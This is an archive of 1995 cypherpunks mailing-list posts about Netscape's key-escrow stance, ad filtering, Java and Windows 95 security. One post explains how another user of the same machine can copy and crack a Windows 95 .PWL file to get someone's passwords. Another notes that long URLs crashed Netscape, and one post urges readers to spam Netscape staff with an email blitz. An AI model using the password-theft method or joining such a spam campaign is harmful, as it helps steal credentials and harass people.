     needs of the Internet. However, these efforts must be accelerated and 
     facilitated by Government, since the Government has as much, if not
     more, interest in increasing the level of security capability in the 
     Internet as does any other segment of society.
[...]
Enhance Internet Application Security

     A number of key Internet applications have become central to agencies' 
     increasing Internet activities. Such key applications should be examined
     and, where appropriate, strengthened to the extent possible. Among the 
     applications that require high-priority attention are the following:
[...]
     Public Information Servers - Second only to email is the expanding use of
     Internet-based public information server methods, most visibly the World 
     Wide Web and the associated Mosaic/Linx client applications. 
     Unfortunately, there are a number of known security vulnerabilities 
     associated with the use of these applications.
----------------

I definitely do _not_ get a sense from anything in this document that 
installing GAK mechanisms is a major concern of the project. The NSA appears
to have a few people involved with the FNC, but not a great visible presence.

-Futplex <futplex@pseudonym.com>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Sat, 2 Dec 1995 10:43:45 +0800
To: Laszlo Vecsey <master@internexus.net>
Subject: Re: Windows95 "Security"
In-Reply-To: <Pine.LNX.3.91.951201201911.32274A-100000@micro.internexus.net>
Message-ID: <Pine.ULT.3.91.951201175232.2911G-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 1 Dec 1995, Laszlo Vecsey wrote:

> Where is the password data file kept?

A separate password file is kept for each "user" in:

  C:\WINDOWS\*.PWL

.PWL files are weakly encrypted with the "default login" password. Once 
you decrypt them, they contain cleartext passwords for every other 
password-protected resource accessed by that user (network servers, 
screen savers, dial-up networking, possibly .PWL-enabled encryption 
utilities).

Somebody supposedly posted code for decrypting .PWL files to sci.crypt.

.PWL files are persistent, i.e., Joe "logs on," saves a couple passwords, 
"logs off," then Judy comes by, hits Escape or various other trivial 
tricks to avoid the need to "log on," picks up Joe's .PWL file, and 
cracks it at her leisure.

Each "user" also gets an unencrypted "profile" that gives all application
preferences. 

Anyone who treats Win95 as if it were a multiuser system is an idiot.

-rich




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Sat, 2 Dec 1995 09:11:11 +0800
To: JonathanZ@consensus.com (Jonathan Zamick)
Subject: Re: Netscape gives in to key escrow
In-Reply-To: <v02120d00ace510ca1c12@[157.22.240.13]>
Message-ID: <199512012319.SAA20311@homeport.org>
MIME-Version: 1.0
Content-Type: text


Jonathan Zamick wrote:
| > Brian Davis wrote:
| >I they tell you about it and you buy it anyway -- tough luck.
| >
| >
| >Same with the cars.  Would *you* buy Pinto with explosives in it????
| >(leaving aside the "inherently dangerous" argument for the moment on the
| >products liability claim).
| >
| >EBD
| 
| Hmm. The key point is that almost no general users will have a clue what
| actual security is, and what GAK is. They _might_ understand the risks of
| having an explosive in their vehicle (but can just as easily argue it wasn't
| properly designed if it went off improperly.) Regardless of what they'd know
| about their vehicle, they can easily claim to had the risks associated with
| GAK improperly represented, Netscape misleading them with deceptive claims
| of security given this potential hole etc.

	I'd just like to add one bit to what Jonathan said here.  That
is the AT&T Clipper phones don't come with 'Big Brother Inside'
stickers on them.  The phrase 'key escrow' is not used in the manual
(near as I remember.)  The disclaimer is in very small print.

	Its not a reasonable expectation that a product being touted
as 'secure' is known to its makers to be insecure.  Expecting John Q.
Public to know that without warning labels seems like a strech.

Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Sat, 2 Dec 1995 09:12:35 +0800
To: beavis@bioanalytical.com (Beavis B. Thoopit)
Subject: Re: available news/mail filtering
In-Reply-To: <199512012001.PAA01825@bioanalytical.com>
Message-ID: <199512012326.SAA20363@homeport.org>
MIME-Version: 1.0
Content-Type: text


Beavis B. Thoopit wrote:

| What news and mail filter programs are available?  Pointers
| will be appreciated.

I like procmail.  Its a steep learning curve, but well worth the
effort.

ftp.informatik.rwth-aachen.de:/pub/packages/procmail/procmail.tar.gz 


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Simmons <jsimmons@goblin.punk.net>
Date: Sat, 2 Dec 1995 11:08:23 +0800
To: cypherpunks@toad.com
Subject: Filtering Net Commercials
Message-ID: <199512020237.SAA03409@goblin.punk.net>
MIME-Version: 1.0
Content-Type: text/plain


On December 1, Timothy C. May wrote:

> One patch I'd pay money to have is one which intercept the "commercials"
> Netscape blasts out at us and replace them with something else (maybe
> nothing, maybe a "quote for the day," maybe something from a
> user-selectable file of items).
>
> I understand that Netscape is collecting money for these "commercials," and
> that they control what is sent out. So, any such patch to intercept/remove
> these commercials would have to be done locally. Can this be done?

This is from a post to cypherpunks back in September.  Given the current
situation, maybe a re-posting is in order.  (If not, flames to my address
please, the list has enough to worry about.)  I just checked, it's still
at the ucsb.edu site.

- - - Begin forwarded message - - -

On the subject of HTTP proxies, 

[SEVERAL FWD'S DELETED, ENTERTAINING SUBJECTS RETAINED]

Subject: The agents/advertising arms race heats up
Subject: OH YEAH BABY, FILTER ME HARDER

>From: Axel Boldt <boldt@math.ucsb.edu>
>Newsgroups: comp.infosystems.www.announce
>Subject: SOFTWARE: Filtering ads out of popular web sites
>Organization: Univ of California at Santa Barbara, Dept of Mathematics
>Approved: www-announce@boutell.com
>Message-ID: <44ercn$nhl@holly.aa.net>

Several popular web sites have recently turned to putting advertising
gifs on their pages. NoShit is a tool that filters these out so that
you don't see them - in fact, you don't even download them in the
first place, thus saving time, money and brain capacity.

NoShit is implemented as a set of patches against Cern httpd to turn
it into a "filtering proxy server". This means that the proxy
maintains a list of URL templates together with corresponding filter
scripts. When a document is requested form the proxy that matches one
of the templates, then the page is piped through the corresponding
script before being presented to the client. This works together with
caching, if desired.

The idea is to run your own personalized NoShit proxy server and point
your browser to it. The proxy does the filtering; the browser doesn't
even know about it. This scheme works with every browser.

I have written a ready-to-use library of filter scripts for a couple
of well known, ad-infected sites, including Yahoo, Lycos, Netscape,
HotWired, CNN, Infoseek and NandO Times. You can change these or add
your own very easily.

Locations:
            <URL:http://math-www.uni-paderborn.de/~axel/NoShit/>
                (Germany)
    
            <URL:http://emile.math.ucsb.edu:8000/~boldt/NoShit/>
                (California)

Enjoy,
  Axel

- - - End forwarded message - - -

-- 
Jeff Simmons                           jsimmons@goblin.punk.net




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "W. Kinney" <kinney@bogart.Colorado.EDU>
Date: Sat, 2 Dec 1995 11:02:39 +0800
To: wiltship@iccu6.ipswich.gil.com.au (PeterWiltshire)
Subject: Re: Talking to Jim
In-Reply-To: <199512012310.KAA23844@iccu6.ipswich.gil.com.au>
Message-ID: <199512020156.SAA15123@bogart.Colorado.EDU>
MIME-Version: 1.0
Content-Type: text/plain



> I emailed Jim Clark day before yesterday about his comments re key escrow.
> He responded.  

Woah. What a radical idea.

Have any of the people busily working away at web pages slamming Netscape
actually bothered to verify that Jim Clark actually said any of the things
he is rumored to have said? I haven't seen any documentation of anything
from what I would consider to be a reliable source. 

If you want to generate publicity about something, you better make damn
sure your facts are correct, or you'll end up looking like an idiot. 
Complaining that Clark didn't deny it isn't good enough.

                                    -- Will





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James M. Cobb" <jcobb@ahcbsd1.ovnet.com>
Date: Sat, 2 Dec 1995 09:22:41 +0800
To: cypherpunks@toad.com
Subject: Cyberspace Inc & Robber Baron Age
Message-ID: <Pine.BSD.3.91.951201190005.6599C-100000@ahcbsd1.ovnet.com>
MIME-Version: 1.0
Content-Type: text/plain


 
 
Friend, 
 
 
11 29 95 Computer underground Digest carries the complete text 
of Rick Moore's article, 
 
        Cyberspace Inc and the Robber Baron Age, 
          an analysis of PFF's "Magna Carta" 
 
scheduled to appear in the print journal, The Information Soci- 
ety. 
 
Here's a sample: 
 
 Instead of an infrastructure for public communications -- like 
 the current Internet, or the American highway system -- cyber- 
 space would be developed as a corporate owned monopoly -- 
 priced at whatever the traffic will bear. 
 
 Instead of providing a "space" in which citizens are free to 
 speak and associate (like Internet), cyberspace would become a 
 profit-machine and propaganda channel for media conglomerates. 
 
 PFF's manifesto is a formula for neo-feudalism in the "Know- 
 ledge Age" -- it is a charter for what could aptly be dubbed 
 "Cyberspace Inc".
 
 
The most recent issues of CuD can be obtained from 
 
            http://www.soci.niu.edu/~cudigest 
 
 
Cordially, 
 
Jim 
 
 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 2 Dec 1995 10:10:15 +0800
To: Eric Murray <ericm@lne.com>
Subject: Re: A "Warning Banner" for Netscape Navigator? Good idea!
Message-ID: <ace4ed99120210044bd6@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:22 AM 12/2/95, Eric Murray wrote:

>You can fix this from the browser.
>Pull down the 'Options' menu, grab the 'Window and Link styles'
>page, and change the default "home page location" from
>netscape's to whatever you want.  I usually use my own home page.
>I never look at Netscape's pages unless I specifically want to
>see something like SSL specs.  If there wasn't a way to
>turn off their home page I'd be pretty pissed off.

Oh, I don't have their home page enabled. What I meant, but perhaps wasn't
clear about in my post, is that the commercials pop up in Yahoo, Infoseek,
Deja News, Excite, and so forth. (OK, so it is inaccurate to say "Netscape"
puts them in.)

Some of the ads are intertwined with the command boxes of the particular
service, and thus may be hard to excise, but others seem to be separate.

Any ideas?

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Graeme Cross <graeme@chem2.chem.swin.edu.au>
Date: Sat, 2 Dec 1995 19:23:36 +0800
To: "James A. Donald" <jamesd@echeque.com>
Subject: Re: Getting a copy of the Jim Clark speech
In-Reply-To: <199512010549.VAA27874@blob.best.net>
Message-ID: <Pine.SGI.3.90.951201190425.16326A-100000@chem2.chem.swin.edu.au>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 29 Nov 1995, James A. Donald wrote:

> At 09:43 PM 11/30/95 -0600, Frank Stuart wrote:
> > I'm working on an "obnoxify" program to convert 
> > normal html documents into documents that look 
> > normal to non-netscape browsers, but are too painful to
> > read with netscape (</BLINK>, <FONT SIZE=1>, etc.).  
> > I think tomorrow evening would be a good time to decide 
> > whether or not to distribute it.
> 
> Is there any way one could set up a dirty pictures web
> page in such a fashion that it would be difficult, painful,
> and impractical to get at the pictures through that page
> with a netscape browser?

This is extremely simple to implement.

Make the pages parsed HTML, check the HTTP_USER_AGENT environment 
variable, if it contains Mozilla, return a message that reads something
along the lines of 'hands off my keys', otherwise return useful data 
(GIFs, whatever...)

Also, remember that Netscape Navigator crashes (or at least version 1.x 
did) on URLs that were very long, and also on pages that contained a 
long string of numbers...

Cheers
Graeme

------------------------------------------------------------------------
Graeme Cross                       
                     Phone: (61 +3) 9214 8185  
                    E-mail: graeme@chem2.chem.swin.edu.au
                   PGP key: http://www.chem.swin.edu.au/~graeme/key.html







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Sat, 2 Dec 1995 17:53:41 +0800
To: cypherpunks@toad.com
Subject: John Gage's comments at Computer Security Day in Cleveland
Message-ID: <9512020042.AA27998@all.net>
MIME-Version: 1.0
Content-Type: text


John Gave gave an interesting pitch for Java at the CSSI Computer
Security Day sessions in Cl;evelan yesterday (November 30).  Among
his comments were:

	Java is not secure - it is "safe"

	He (John Gage) regularly downloads binary executables from the
	Internet and runs them on his workstation at Sun - (connected to
	the internal Sun network).

	Sun has terrible physical security - unknown people roam the halls
	at night all by themselves.

	In 2 years, you will be able to buy a computer that does more than
	a Sparc now does, in a portable package the size of a cell
	phone, with more than 30 million bits per second of mobile
	bandwidth direct to the Internet, for less than $30.

-> See: Info-Sec Heaven at URL http://all.net/
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Sat, 2 Dec 1995 09:44:33 +0800
To: cypherpunks@toad.com
Subject: Re: Aware's radiation detector
Message-ID: <v02120d12ace54537e56f@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


>> This month's Scientific American has an ad by Aware for that serial port
>> radiation detector we were discussing a while back. Upper right corner
>> of page 109, I think. Sells for $149 US, 45 day money back guaranty.
>
>This wouldn't be the wavelet company in Cambridge, MA, would it?

This reminds me at mobile world this week, some of the wearables guys at
Steve Roberts' BEHEMOUTH booth showed me a $20 alpha and beta detector half
the size of a matchbook. Said something about it being Russian surplus...

Cheers,
Bob

-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA (617) 958-3971
"Reality is not optional." --Thomas Sowell
The NEW(!) e$ Home Page: http://thumper.vmeng.com/pub/rah/
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Laszlo Vecsey <master@internexus.net>
Date: Sat, 2 Dec 1995 09:56:25 +0800
To: cypherpunks@toad.com
Subject: Windows95 "Security"
Message-ID: <Pine.LNX.3.91.951201201911.32274A-100000@micro.internexus.net>
MIME-Version: 1.0
Content-Type: text/plain


Where is the password data file kept?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Charles Gimon" <gimonca@mirage.skypoint.com>
Date: Sat, 2 Dec 1995 14:55:14 +0800
To: cypherpunks@toad.com
Subject: [NOISE] Fun quote
Message-ID: <m0tLhnG-0004vjC@skypoint.com>
MIME-Version: 1.0
Content-Type: text/plain



Just heard on tonight's "X-Files"...

"The NSA?? Since when did they start issuing you guys
piano wire instead of guns??"

I can hear the clatter of .sig files being updated all
over the net.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Sat, 2 Dec 1995 10:20:23 +0800
To: cypherpunks@toad.com
Subject: Re: Cyberspace Inc & Robber Baron Age
Message-ID: <v02120d34ace55b5b1912@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


> Instead of an infrastructure for public communications -- like
> the current Internet, or the American highway system -- cyber-
> space would be developed as a corporate owned monopoly --
> priced at whatever the traffic will bear.

More technophobic hogwash from an industrial-centralist mind.

Anyone who looks at the possibilty of semi-autonomous, hell, autonomous,
software out there buying and selling things "out of control" of the people
who use it, much less those who wrote it, in an emergent-structure chaotic
microtransaction market, on a network where the price of semiconductor
switching falls exponentially, making everything, code, hardware,
link-lengh, everything, smaller and smaller and faster and faster, (inhale)
can't possibly say stuff like that.

These folks are looking backwards so far they're going to trip over the future.

Feh.

;-)

Cheers,
Bob Hettinga
<roasted tail-feathers and all...>


-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA (617) 958-3971
"Reality is not optional." --Thomas Sowell
The NEW(!) e$ Home Page: http://thumper.vmeng.com/pub/rah/
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Sun, 3 Dec 1995 13:05:12 +0800
To: Michael Froomkin <cypherpunks@toad.com>
Subject: Re: FW: websurfer 4.6 (fwd)
Message-ID: <199512030450.UAA06088@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 11:56 AM 12/2/95 -0500, Michael Froomkin wrote:
>so much for compatibility....guess I'm sticking with netscape for now.


Websurfer is intolerably buggy.

The latest Mosaic seems pretty good to me.


>
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lindat@iquest.net (Linda Thompson, American Justice Federation)
Date: Sat, 2 Dec 1995 11:03:18 +0800
To: news@aen.org
Subject: C'MON N' GIVE 'EM HELL, NET-NERDS!!!!
Message-ID: <m0tLhQS-00033cC@iquest.net>
MIME-Version: 1.0
Content-Type: text/plain


They asked for it:

"To secure Net communications, the government will need to
have access to private data exchanges using what is known as a key escrow
security system," -Netscape Communications chairman Jim Clark, arguing for
a security system called key escrow that would require you to give the
government access to your private messages.

Source: STAMPER'S NEWS NUGGETS 

(1)  SPAM THE SIGN
 Netscape has a webpage at www.netscape.com.  There is a "toys" area and any
message you leave in that area goes to an ELECTRONIC MARQUEE SIGN at
Netscape that all the employees can see.  SPAM THAT SIGN.

(2) SPAM NETSCAPE

Here's where the EMAIL BLITZ should go (extra points for creativity):

info@netscape.com 
     General information 

admgr@netscape.com 
     Netscape site advertising sales 

x_cbug@netscape.com 
     Bug reports from X Window users 

win_cbug@netscape.com 
     Bug reports from Windows users 

mac_cbug@netscape.com 
     Bug reports from Macintosh users 

hr@netscape.com 
     Netscape Human Resources department 

training@netscape.com 
     Netscape Training programs information 

admgr@netscape.com 
     Netscape site advertising sales and Sponsor program information 

proprietor@netscape.com 
     Netscape electronic store feedback 

editor@netscape.com 
     Feedback about Netscape's Net site 

ssl-talk-request@netscape.com 
     E-mail list for Secure Sockets Layer protocol discussion 

standards@netscape.com 
     Questions about Netscape's open-standards activities 

nswinapi-talk-request@netscape.com 
     E-mail list for users of the Windows Netscape Server API 
CORPORATE HEADQUARTERS 

-------------------------------------------------------------

NETSCAPE COMMUNICATIONS CORPORATION 
     501 E. Middlefield Rd.
     Mountain View, CA 94043
     415/528-2555 Product and sales information (7:00 a.m. to 5:00 p.m. PST)
     415/254-1900 Executive offices
     415/528-4124 Fax
     http://www.netscape.com 

ATLANTA 
     Netscape Communications Corporation
     1850 Parkway Pl.
     Suite 420
     Marietta, GA 30067

CHICAGO 
     Netscape Communications Corporation
     2159 N. Seminary
     Chicago, IL 60614

DALLAS 
     Netscape Communications Corporation
     17304 North Preston Road
     Suite 800
     Dallas, Texas 75252

NEW YORK 
     Netscape Communications Corporation
     599 Lexington Ave.
     Suite 2300
     New York, NY 10022

NORTHWEST 
     Netscape Communications Corporation
     501 Middlefield Rd.
     Mountain View, CA 94043

SOUTHWEST 
     Netscape Communications Corporation
     111 N. Sepulveda Blvd.
     Manhattan Beach, CA 90266

WASHINGTON, D.C. 
     Netscape Communications Corporation
     6701 Democracy Blvd.
     Suite 300
     Bethesda, MD 20817

THANKS AND A HAT TIP TO HELEN AT E.PLURIBUS  FOR GETTING ALL THE
ADDRESSES!!!!!!!!
Kind regards,

***********************  V  *************************
          DEATH TO THE NEW WORLD ORDER
****************************************************

Linda Thompson
American Justice Federation
Home of AEN News & news videos, "Waco, the Big Lie,"  "America Under Siege"
3850 S. Emerson Ave.
Indianapolis, IN 46203
Telephone:  (317) 780-5200
Fax:  (317) 780-5209
Internet:  lindat@iquest.net

**************************************************
   Remember Waco.  The Murderers are still free.
***************************************************

The Army is going to courtmartial Spc. Michael New 
for not wearing a U.N. uniform, but the Army won't
courtmartial the members of the 160th and 158th
Special Operations, 82nd Airborne, Ft. Hood Cav
Members, and 10thMountain Division members 
who helped MURDER CHILDREN at Waco.

What's wrong with this picture?











From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Sat, 2 Dec 1995 14:55:33 +0800
To: cypherpunks@toad.com
Subject: Re: A "Warning Banner" for Netscape Navigator? Good idea!
Message-ID: <v02120d3eace5624bba5c@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


It's been a long and interesting day...

>Pull down the 'Options' menu, grab the 'Window and Link styles'
>page, and change the default "home page location" from
>netscape's to whatever you want.

Oh. *Those* advertisements! I couldn't for the life of me figure out *what*
Tim was talking about. I've made mine come up blank since the initial,
"Hey, what do these twiddly bits in the Preferences command do...", session
after the first download. You can also put up a type-it-yourself URL window
on the browser window, which comes in handy now that you have to wait 10
seconds (on my dinky PB 180) every time you change code modules in 2.0b3
Netscape (like touching<!> the menu bar for the first time, or looking at
the bookmark window)... Like I've said elsewhere, Netscape is hierarchical
code trying to conquer a geodesic (a word I got from Bucky Fuller, through
Peter Huber, just so I keep my attributions straight...) network. It ain't
gonna fly, in the long run, folks.

In that vein, could someone e-mail me the best non-netscape Mac browser, so
I don't get HTML-nasties when I go play on the cactus machine?

Anyway...

Dave Winer(sp?), the Mac-Developer-turned-gadfly (speak not ill of the
other gadflies, I always say...), talks about seeing some Netscape
(sorry...) patches which actually *do* strip banner ads from various
web-pages. I believe you have to tell it which pages, and what the banners'
file names are, but I'm not sure. Don't know where *Weiner(sp?)* got it
from... I seem to remember the name "Ad Stripper" but I could be imagining
things...

Of course, if that's the way this code really operates, simply changing the
name of the HREF call regularly on the server side, which is probably done
anyway, with all the web-management code showing up out there, defeats
ad-filters of this kind completely...

Obcrypto: Maybe these web-pages will send you nanocash (not mine, either,
sorry, taken from one of the wearable-people at mobileworld, I'll look up
their name, and get back to you. soon. I promise.) to watch their message?

Also, could someone talk here about how easy it might be to spoof Java
"byte code"? The Java presentation at this conference had a lot of
hand-waving and reverent invocation of Whit Diffie's name, so it might not
be trivial. Another feature of this presentation was a really splendid
"subjective axis" chart showing how "powerful" Java is in comparison to
say, client-server, HTML, and other "technologies". This chart reminded me
for all the world of the famous "Pravda Charts" that Tufte likes to lampoon
in "The Graphical Representation of Quantitative Information". Just so I
keep my sources straight. Of course.

To quote Prof. Tufte. "If it looks like a duck, ignore it." Or something to
that effect. Maybe the word "waddle" was in the sentence. Maybe he got it
from someone else... I'll get back to you on that. I really will...

;-).

Cheers,
Bob Hettinga

-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA (617) 958-3971
"Reality is not optional." --Thomas Sowell
The NEW(!) e$ Home Page: http://thumper.vmeng.com/pub/rah/
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: FutureNet Server <nobody@futurenet.co.uk>
Date: Sun, 3 Dec 1995 01:41:43 +0800
To: cypherpunks@toad.com
Subject: FutureNet Registration
Message-ID: <9512012209.AA22388@webserv.futurenet.co.uk>
MIME-Version: 1.0
Content-Type: text/plain



Congratulations, you have just sucessfully registered for FutureNet,
Europe's most popular e-zine.

Your registration details are:

  Username: cypherpunks
  Password: cypherpunk

You should bookmark a page within FutureNet so that you can revisit
the site without having to type in your username and password again.
The URL for the FutureNet homepage is:

  http://www.futurenet.co.uk/,cypherpunks,cypherpunk,/menu.html

Keep this message somewhere safe, it contains your FutureNet reader
identification details.  If you have any problems accessing FutureNet,
send mail to webmaster@futurenet.co.uk.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 3 Dec 1995 05:57:13 +0800
To: cypherpunks@toad.com
Subject: Re: A "Warning Banner" for Netscape Navigator? Good idea!
Message-ID: <ace520b5130210044dd8@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:39 AM 12/2/95, Robert Hettinga wrote:
>It's been a long and interesting day...
>
>>Pull down the 'Options' menu, grab the 'Window and Link styles'
>>page, and change the default "home page location" from
>>netscape's to whatever you want.
>
>Oh. *Those* advertisements! I couldn't for the life of me figure out *what*
>Tim was talking about. I've made mine come up blank since the initial,
>"Hey, what do these twiddly bits in the Preferences command do...", session

Indeed, I figured this out a long time ago, too. As I said in a recent
post, I don't have Netscape's page come up when I start Netscape.

The ads I'm talking about are the ads introduced when various Net tools are
used, such as Infoseek, Deja News, Excite, Yahoo, etc.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Sun, 3 Dec 1995 01:41:14 +0800
To: cypherpunks@toad.com
Subject: Info on Netscape's key escrow position
Message-ID: <199512020701.XAA01919@ammodump.mcom.com>
MIME-Version: 1.0
Content-Type: text/plain



  I had lunch with Jim Clark today, and explained the furor that was
currently going on in cypherpunks and elsewhere.  After lunch he sent
me the e-mail that I've attached below to pass along.  I think the gist
of it is that if governments require key escrow, we will have to do it
in order to sell our products with encryption into those countries.

  We've actively lobbied against the government's proposal through
our participation and support of industry efforts by the ITAA, BSA,
SPA and others.  Next week we will be sending two representatives
to the NIST key escrow conference in DC.  In preparation for that
meeting we have been formulating an official company position on
key escrow and export restrictions.  Phil, myself, and other folks with
cypherpunk leanings are involved in writing the policy statement.
We are planning on taking a firm position against the government's
key escrow proposals.  Some time next week we will be posting our
statement publicly, and will welcome your comments on it then.

  After the NIST meeting we will also be talking to folks in congress
and the white house about our position, looking for help in getting the
current export limitations removed.  We will also be looking for
help in getting the government's position on export controlled FTP
sites clarified so that we can make the US version of the Navigator
with 128-bit crypto available for download by those people who are
legally allowed to use it.

  We don't have any plans to stop doing separate US and export
versions of our software.  As long as our customers want strong
crypto and the government lets us sell it, I think we will keep
doing it.

	--Jeff

Jim Clark wrote:
> 
> I made some pragmatic comments.
> 
> I said that if we are to use this encryption technology in business, we must
> have a better solution than to limit keylength or put keys in escrow. All
> governments of the world have a valid concern about terrorism and other
> activities of concern to the security of their nations. All of them will
> continue to restrict our ability to provide products to their markets unless
> we build in some mechanism that allows them to legally access
> information that is in the interest of their national security. (We obviously
> cannot be involved in determining what is legal by the laws of that country.)
> This is not just a US government problem. Until recently, France did not even
> allow us to sell products with 40-bit keys, much less 128-bit keys.
> 
> A lot of ordinary citizens are rightly concerned about their own privacy. I
> am one of them. I do not want the government to snoop on me, but in fact the
> government, through the FBI, can now tap my phone without my knowing it by
> simply getting sufficient evidence that I am conducting illegal activities,
> then presenting this evidence to a court to get permission. I have no say in
> the matter.
> 
> If we as a company were to take the position that in no case will we allow
> a government to get access to our encrypted messages, or refuse to allow
> key escrow with our products, the governments of the world will quickly put
> us out of business by outlawing the sale of our products in their countries.
> The fundamental issue is how do we accommodate the requirements of governments,
> while protecting our rights as citizens.
> 
> None of this represents the position of Netscape with respect to what we
> will do. But if we do not come up with a solution to this problem that is
> acceptable to each government, we will not be able to export our products,
> except with a short key length (e.g. 40 bit keys), and that will not be
> acceptable to corporate customers in other countries. They will create their
> own solution, and we will not be able to sell to a larger world market. In
> fact, we could even be ordered by our own government to establish a key
> escrow system for its use inside the US.
> 
> Ironically, anyone in the US may import unbreakable encryption technology from
> another country -- we just cannot sell it back to them. No one ever accused the
> government of being rational.
> 
> I chair an industry group called the "Global Internet Project", with members
> from almost twenty companies, including companies from Asia and Europe. This
> was the central issue we all agreed upon this morning, and we are putting
> together a policy statement whose purpose is to educate lawmakers on the
> importance of quick resolution of this matter.
> 
> Thanks for your concern. Let me know what you like and don't like.
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Laszlo Vecsey <master@internexus.net>
Date: Sat, 2 Dec 1995 12:43:36 +0800
To: cypherpunks@toad.com
Subject: Netscape, Mosaic, and other goodies.
Message-ID: <Pine.LNX.3.91.951201231649.5324C-100000@micro.internexus.net>
MIME-Version: 1.0
Content-Type: text/plain


> > > The field is User-Agent. However, blocking access to users of Navigator 
> > > isn't a particularly useful thing to do. If you must do something, why 
> > > not modify your GET handler to add a header to the start of all html 
> > > pages informing people of the problem, and suggesting alternatives. 
> > 
> > Great idea! I'm sure there is a cypherpunk on this list willing to write a 
> > patch to NCSA HTTPd to get the job done, in a configurable manor of 
> > course so that a template.html would be 'inserted' at the top of every 
> > document sent out to the specified browser. Any takers?
> 
> No need. Simply add
> 
> <meta http-equiv="Refresh" content="1;URL=netscape-warning.html">
> 
> to the start of your page. Netscape browsers will be redirected.

Are you sure Netscape browsers are the only ones that currently implement 
this tag? Other browsers will be implementing it soon enough I'm 
sure. I think the only fool-proof way of doing it is at the webserver.

Anyway, isn't 5 million bux a little too much for the government to give 
Netscape for the security improvements? I would think that for less than a 
million a group of programmers could be rounded up to create a stable 
multi-platform web navigator with VRML, MPEG, Audio, Postscript, and a 
zillion other features built in. :)

It's funny how one day we are raving about how great Netscape is, and the 
next day we hate them. If we aren't pleased with a particular piece of 
software, instead of argueing about it we should just go and make one 
that we are pleased with. Using the many libraries available such as MPEG, 
GIF, JPEG for example and releasing it under the GNU agreement is the way 
to go. Or perhaps we should just back the original browser, NCSA Mosaic. 
With some improvements it could once again be the best browser on the net.

I suppose I'm not clear about the implications of these eskrow keys... 
just because the government is supporting it, and Netscape will be 
implementing it doesn't mean that we have to use it. Is it against the 
law to encrypt data (using your own method) and send it over the Internet?
I don't think so.

...





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Sat, 2 Dec 1995 15:53:30 +0800
To: cypherpunks@toad.com
Subject: Re: nsa and netscape
